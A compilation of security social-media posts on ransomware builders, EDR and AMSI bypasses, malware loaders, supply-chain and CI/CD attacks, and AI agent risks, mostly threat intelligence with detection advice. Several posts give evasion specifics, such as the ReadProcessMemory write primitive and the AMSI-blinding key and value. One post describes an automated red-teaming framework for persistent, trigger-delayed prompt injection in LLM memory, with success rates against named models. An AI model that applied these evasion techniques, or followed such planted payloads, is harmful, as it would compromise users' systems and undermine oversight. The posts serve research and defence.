Advanced Runtime Attack Techniques

Analyzing the leaked code from the Vanhelsing Ransomware, it is essentially a highly modular and automated builder, developed in C++, designed to dynamically generate executable binaries (.exe) based on instructions received from a C2 server. The core logic includes a persistent loop (wmain) that continuously polls for new tasks via REST HTTP requests to an attacker-controlled endpoint. When a task is received, the system automatically compiles two binaries: the locker, responsible for encrypting the victim's files, and the decrypter, which allows for data recovery if the correct key is provided. The main payload is encrypted using AES-256-GCM (via libsodium), with a key derived from an X25519 key pair. The compiled locker binary is read, encrypted, converted into a binary header, and embedded into the loader, which is the final stage responsible for decrypting and executing the locker at runtime. The modular architecture allows the same locker to be reused with multiple loaders. File operations are handled directly through low-level Win32 API calls (CreateFileA, ReadFile, MoveFileA, DeleteFileA), with no dependency on external libraries. PowerShell’s Compress-Archive is also used to efficiently package and transmit artifacts via HTTP. There is a clear separation of responsibilities in the build pipeline: reading, encryption, macro substitution, architecture-specific compilation (Win32/x64), binary renaming, and upload to the C2 are all handled in well-defined stages, with error handling and diagnostics performed via GetLastError(). Summary of Evasion Techniques: - Encryption of artifacts using X25519 + AES-256-GCM - Use of fileless-like execution via loader with embedded payload - Per-build uniqueness through dynamic key and ID insertion - Compilation via MSBuild (LOLBin abuse) #redteam #cybersecurity #malware #malwaredevelopment #malwareanalysis

9 tries... That's all it took to break Gemini across all 6 attack stages. New research just dropped, and I'm proud to have had a small part in it. LAAF, the Logic-layer Automated Attack Framework, is the first automated red-teaming framework built for a vulnerability class that had no testing tool: Logic-layer Prompt Control Injection (LPCI). If you think this is about standard prompt injection, it's not. LPCI payloads persist in memory and vector stores. They survive session boundaries. They sit dormant until a trigger fires, a keyword, a tool call, or a turn count. Then they execute in sessions you thought were clean. The team built a 49-technique taxonomy across six attack categories: 1. Encoding 2. Structural manipulation 3. Semantic reframing 4. Layered combinations 5. Trigger timing 6. Exfiltration Combined with variants and lifecycle stages, that's a theoretical space of 2.8 million unique payloads. The core of LAAF is the Persistent Stage Breaker. When a payload breaks through one stage, it seeds the next stage with a mutated version of what worked, which is exactly how a real attacker escalates. We tested against five production LLM platforms. Gemini. Claude. LLaMA3. Mixtral. ChatGPT. Mean aggregate breakthrough rate across three independent runs: 84%. Gemini fell in 9 total attempts. Claude's document-access mode was broken in a single attempt through a compliance reframe. ChatGPT held at some stages and collapsed at others. Wake-up call... These were baseline defenses. Standard system prompts with no custom guardrails, no enterprise security stack, no layered filtering. So you might say to yourself, "Ok, so our protections will cover us." Now, remind yourself of your half-baked agent stack with persistent memory, RAG pipelines, and tool access bolted on with default permissions. The answer is probably worse than 84%. The framework is open source. The taxonomy is published. The winning techniques for each platform and stage are all documented. Huge credit to Hammad Atta - CISA-CISM for leading this research and the full team of co-authors, Ken Huang, Vineeth Sai Narajala, and the rest. 👉 Paper is attached. 👉 Follow and connect for more AI and cybersecurity insights with the occasional rant #AgenticAISecurity #LLMRedTeam #PromptInjection Keren Katz Chris Hughes Kayla Underkoffler Michael Bargury Ben Hanson Ben Kliger John Sotiropoulos Helen Oakley Eva Benn Evgeniy Kokuykin Allie Howe Laz . Idan Habler, PhD Tomer Elias Ariel Fogel Steve Wilson Rob van der Veer Aruneesh Salhotra Behnaz Karimi Dan Sorensen Peter Holcomb Douglas Brush Fred Wilmot Richard Bird Dutch Schwartz Mike May Jared Smith Karen Worstell, MA, MS Sabrina Caplis Ron F. Del Rosario Sandy Dunn Itzik Kotler Ron Bitton, PhD Jason Haddix Philip A. Dursey John V. Zenity

🔍 Day 33/100 — Daily Intel 🚨 New Indirect-Shellcode-Executor Tool Bypasses AV/EDR Using Windows API Quirk A new Rust-based offensive tool, Indirect-Shellcode-Executor, demonstrates a novel EDR bypass technique by abusing a little-known behavior in the Windows API. 🧩 How the bypass works: The tool exploits the ReadProcessMemory function — normally used only for reading — by manipulating the lpNumberOfBytesRead pointer to write bytes into process memory. 🔸 This creates a write primitive using a read API 🔸 Completely sidesteps hooked functions like WriteProcessMemory, memcpy, etc. 🔸 Avoids classic code-injection detection heuristics ⚙️ Key Capabilities (Rust PoC): 🌐 Remote payload execution (C2-hosted shellcode, incl. hiding in PNG/asset files) 💻 Terminal injection (pass raw shellcode via CLI) 📁 File-based injection (payload stored in documents or temp files) 📌 Why this matters: This technique lives below the radar of current EDR visibility. Most vendors hook write-oriented APIs — few monitor unexpected R/W mismatches in ReadProcessMemory. This expands the “living off the Windows API” attack surface for red teams and real adversaries. 🛡️ Defensive Takeaways: º Monitor suspicious ReadProcessMemory calls targeting RWX or executable regions º Flag abnormal lpNumberOfBytesRead pointer usage º Combine API telemetry with memory behavior analytics rather than relying solely on API hooking https://lnkd.in/dnMftwqM #WindowsSecurity #EDRBypass #AVBypass #Shellcode #Rust #RedTeam #ThreatIntel #Malware #DFIR #DetectionEngineering #CyberSecurity #ExploitResearch #Day33of100 #100DaysOfIntel

Deep dive into EDR evasion techniques used by modern attackers - a comprehensive analysis by Mat Cyb3rF0x Fuchs covering everything from LOLBins to kernel-level bypasses. Five key evasion categories: • Living off the Land: Attackers abuse trusted system utilities (PowerShell, WMI, CertUtil) to blend malicious actions with legitimate operations • Process Injection: Hiding malicious code inside legitimate processes like explorer.exe through hollowing and thread injection • Hook Bypassing: Evading EDR visibility by unhooking APIs or using direct/indirect syscalls to circumvent monitoring • In-Memory Evasion: Running payloads entirely in memory with encryption and obfuscation to avoid detection during idle periods • EDR Tampering: Disabling security through "Bring Your Own Vulnerable Driver" (BYOVD) to gain kernel access and terminate protected processes Detailed threat actor examples and practical defensive mitigations included for security teams looking to harden their environments.

THREAT CAMPAIGN: MULTI-STAGE IN-MEMORY LOADER USING STEGANOGRAPHY AND PROCESS INJECTION ℹ️ Researchers have identified a sophisticated commodity malware loader actively used in targeted email campaigns by multiple advanced threat actors. These campaigns show precise regional and sector targeting, especially manufacturing and government organizations in 🇮🇹Italy, 🇫🇮Finland, and 🇸🇦Saudi Arabia. ℹ️ Despite different delivery methods (e.g., weaponized documents, SVGs, ZIP/LNK archives), all use a common loader architecture, suggesting a shared framework or ecosystem among attackers. Emails are crafted to resemble legitimate business communications, such as purchase orders, to trick recipients into executing malicious attachments. 📍 MULTIPLE DELIVERY VECTORS The campaign uses a variety of file types and delivery mechanisms, including: ■ Weaponized Office documents exploiting vulnerabilities like CVE-2017-11882; ■ Malicious SVG files; and ■ Compressed archives with LNK shortcuts. All of these serve as triggers for the loader. 📍 EVASION TECHNIQUES The loader employs several stealthy tactics: ■ Steganography, hiding payloads inside benign image files. ■ Trojanizing open-source libraries so they appear legitimate but contain hidden malicious behavior. ■ A four-stage evasion pipeline, including obfuscation, in-memory execution, and process injection to evade forensic detection. 📍  LOADER The infection chain typically follows these phases: ■ 1. Initial Execution: Email attachment executes obfuscated script (e.g., JavaScript) that spawns PowerShell. ■ 2. Steganographic Payload Retrieval: Payload is pulled from a hosted image and decoded in memory (no disk artifacts). ■ 3. Trojanized Component Loading: A genuine open-source library (e.g., TaskScheduler) is embedded with malicious functions and loaded reflectively. ■ 4. Process Injection & Payload Execution: Malicious code is injected into a legitimate system process to avoid detection and the real malware (e.g., RAT or stealer) is executed. 📍 PAYLOADS DELIVERED The loader can deliver a range of secondary malware, depending on the campaign, such as: ■ Remote Access Trojans (RATs) and ■ Infostealers like PureLog Stealer, Katz Stealer, DC Rat, AsyncRat, Remcos, etc. These payloads are designed to exfiltrate credentials, system information, or enable full remote compromise. 📌 Source: Cyble 🔗 https://lnkd.in/ddnwfYWk #threathunting #threatdetection #threatanalysis #threatintelligence #cyberthreatintelligence #cyberintelligence #cybersecurity #cyberprotection #cyberdefense

Fake Claude Code installers are dropping RedLine stealer. Google Ads (malvertising) is the delivery mechanism. Trend Micro researchers published details on an InstallFix campaign targeting users searching for Anthropic's Claude AI. Attackers purchased Google Ads placements for terms like "Claude Code install," leading victims to fake landing pages with OS-specific installation commands. Typical ClickFix/InstallFix workflow:  - Copy the command  - paste it into your terminal  - system executes mshta.exe against a remote ZIP/HTA polyglot payload.  - mshta fetches a file disguised as an MSIX bundle (actually a ZIP with HTA appended at byte offset 882290)  - VBScript executes via COM Shell.Application with the window resized to 0x0  - cmd.exe reconstructs "powershell" from split variables to evade static detection, and a base64-encoded stager runs with AMSI already blinded. The AMSI bypass is one of many detection opportunies you can take advantage of here, provided you have endpoint logging telemetry.  The stager RC4-decrypts bypass strings using the key "BWJFEesMEqRvjQbm," then writes "0x41414141" to amsiContext via "[Runtime.InteropServices.Marshal]::WriteInt32". That specific combination of "WriteInt32" and "0x41414141" in a PowerShell script block is a strong signal as legitimate code should typically not write "AAAA" to AMSI's context buffer. Link to rule at detections.ai: https://lnkd.in/gQFke6rD The C2 uses victim-unique subdomains derived from MD5(COMPUTERNAME+USERNAME), meaning each infected host contacts a different URL. Bulk network blocking becomes harder, but the AMSI bypass pattern stays consistent across all victims. Research by Trend Micro: https://lnkd.in/gZ8yCviH Additional rules and threat intel details at detections.ai: https://lnkd.in/gYQzWZSd

Fake “coding interview” projects are now a full-on persistence play against Next.js developers. Microsoft Defender Experts just documented a campaign where North Korea-linked operators deliver Trojanized Next.js repos as take-home interview tasks and “assessment projects”. Open the repo in Visual Studio Code, trust the workspace, run the dev server, and the attacker gets remote code execution plus a staged command-and-control channel. The mechanics are very developer‑workflow aware. Some repos ship a .vscode/tasks.json that auto-runs when the workspace is trusted, chaining Node.js into a fetch‑and‑execute loader that pulls attacker JavaScript at runtime. Others hide obfuscated logic directly in app code so that `next dev` or a standard build command silently decodes and retrieves the next payload. In both paths, the result is in‑memory JS that establishes long‑lived C2, data exfiltration, and the ability to push arbitrary follow‑on tooling. This is not about an npm typo or a random GitHub repo any more. It is your interview homework, your “sample project”, your normal IDE prompts asking whether you trust this folder. The attack surface is whatever developers are socially conditioned to treat as routine.

Attackers are treating CI/CD like Tier-0 infrastructure...one of the most privileged environments in the enterprise. The recent TeamPCP GitHub Actions attack is a good example of where things are going. This wasn’t just a compromised repo. It was a clean, repeatable playbook: ➡️ Compromise a GitHub Action ➡️ Retag it to point to malicious code ➡️ Let it run inside trusted pipelines ➡️ Steal secrets and tokens ➡️ Move laterally That’s the attack. If your pipeline runs it, your company trusts it. And that’s exactly what was exploited. What actually broke here wasn’t one control. It was a set of assumptions: 1️⃣ People are still trusting tags instead of immutable references 2️⃣ CI tokens have way too much privilege 3️⃣ Secrets are long-lived and broadly accessible 4️⃣ There is little to no visibility into what CI jobs actually do at runtime This didn’t get caught by static controls. It showed up when someone looked at runtime behavior. What needs to change: 🛡️ First, stop trusting the supply chain by default - Pin actions to SHAs, not tags - Allowlist what can run in your pipelines 🛡️ Second, fix identity - Move to OIDC and short-lived credentials - Reduce permissions at the workflow level - Assume anything running in CI could be compromised 🛡️ Third, treat CI like a hostile environment - Use ephemeral runners - Lock down outbound network access - Do not expose secrets to untrusted jobs 🛡️ Fourth, add runtime visibility - Monitor process execution and network activity - Alert on anything that looks like exfiltration This is not just a DevSecOps problem anymore. This is identity, supply chain, and runtime security all meeting in one place. And attackers are already there. Your CI/CD pipeline is not just a build system. It is a high-trust execution layer so it is time to start treating it that way. #CyberSecurity #CISO #DevSecOps #CloudSecurity #SupplyChainSecurity https://lnkd.in/e5SWmzSh

The most repeatable pattern ever. Anthropic drops a new feature, I get excited, then read the docs, and facepalm. And no, this isn’t a post about Mythos. My latest deep dive: Claude Managed Agents. It's genuinely impressive. It’s Anthropic’s way of lifting the infrastructure burden of operating long-running agents. It helps you manage everything you need, from the agent to the container it runs in. It even has a new credential vault to help protect your MCP credentials. But new features = new attack surface. I’ll spare you the deep dive into the architecture. You can check the blog for those details. Instead, I’ll skip straight to the risks that stood out to me: 𝗠𝗲𝗺𝗼𝗿𝘆 𝗽𝗼𝗶𝘀𝗼𝗻𝗶𝗻𝗴: Agents can have persistent memory that survives across sessions. Great from an agent productivity standpoint. Also, a prime target for attackers who want to quietly influence an agent's behavior over time. 𝗘𝗻𝘃𝗶𝗿𝗼𝗻𝗺𝗲𝗻𝘁 𝗺𝗮𝗻𝗶𝗽𝘂��𝗮𝘁𝗶𝗼𝗻: The preconfigured container is the foundation on which everything runs. If an attacker can touch it, they can control a lot from there. 𝗕𝗶𝗻𝗮𝗿𝘆 𝗲𝘅𝗲𝗰𝘂𝘁𝗶𝗼𝗻: You can upload and execute binary files in the environment. The history of web application security has a lot to say about what happens when you let users upload files without checking if they're malicious. Oh, and the environment containers also have SSH and SCP by default. No attacker has ever used those for malicious purposes, ever…oh, wait… 𝗠𝗮𝗹𝗶𝗰𝗶𝗼𝘂𝘀 𝗱𝗼𝗰𝘂𝗺𝗲𝗻𝘁𝘀: Agents can read uploaded files. That's another door for prompt injection to walk through. This doesn't mean you shouldn't use Managed Agents. It means deploy with the right controls and visibility. Here's what to do right now: 𝟭. 𝗚𝗲𝘁 𝗮𝗻 𝗶𝗻𝘃𝗲𝗻𝘁𝗼𝗿𝘆: What agents, environments, and sessions are already running? Your cloud infrastructure just expanded into Anthropic's servers. 𝟮. 𝗔𝘀𝘀𝗲𝘀𝘀 𝘁𝗵𝗲 𝗰𝗼𝗻𝗳𝗶𝗴𝘂𝗿𝗮𝘁𝗶𝗼𝗻: What packages are installed? What network restrictions are in place? Is it locked down or a free-for-all? 𝟯. 𝗘𝘀𝘁𝗮𝗯𝗹𝗶𝘀𝗵 𝗿𝘂𝗻𝘁𝗶𝗺𝗲 𝗺𝗼𝗻𝗶𝘁𝗼𝗿𝗶𝗻𝗴: You have a new place where agents are operating with zero visibility into them. Security teams are in an all-out sprint just to keep up with the pace of new features. The attack surface isn’t waiting for anyone to catch up. If your team is experimenting with Managed Agents and wants to get ahead of this before it becomes an incident, shoot me a DM. Read the full blog with an overview of the features and risk: https://lnkd.in/eZEMU8XT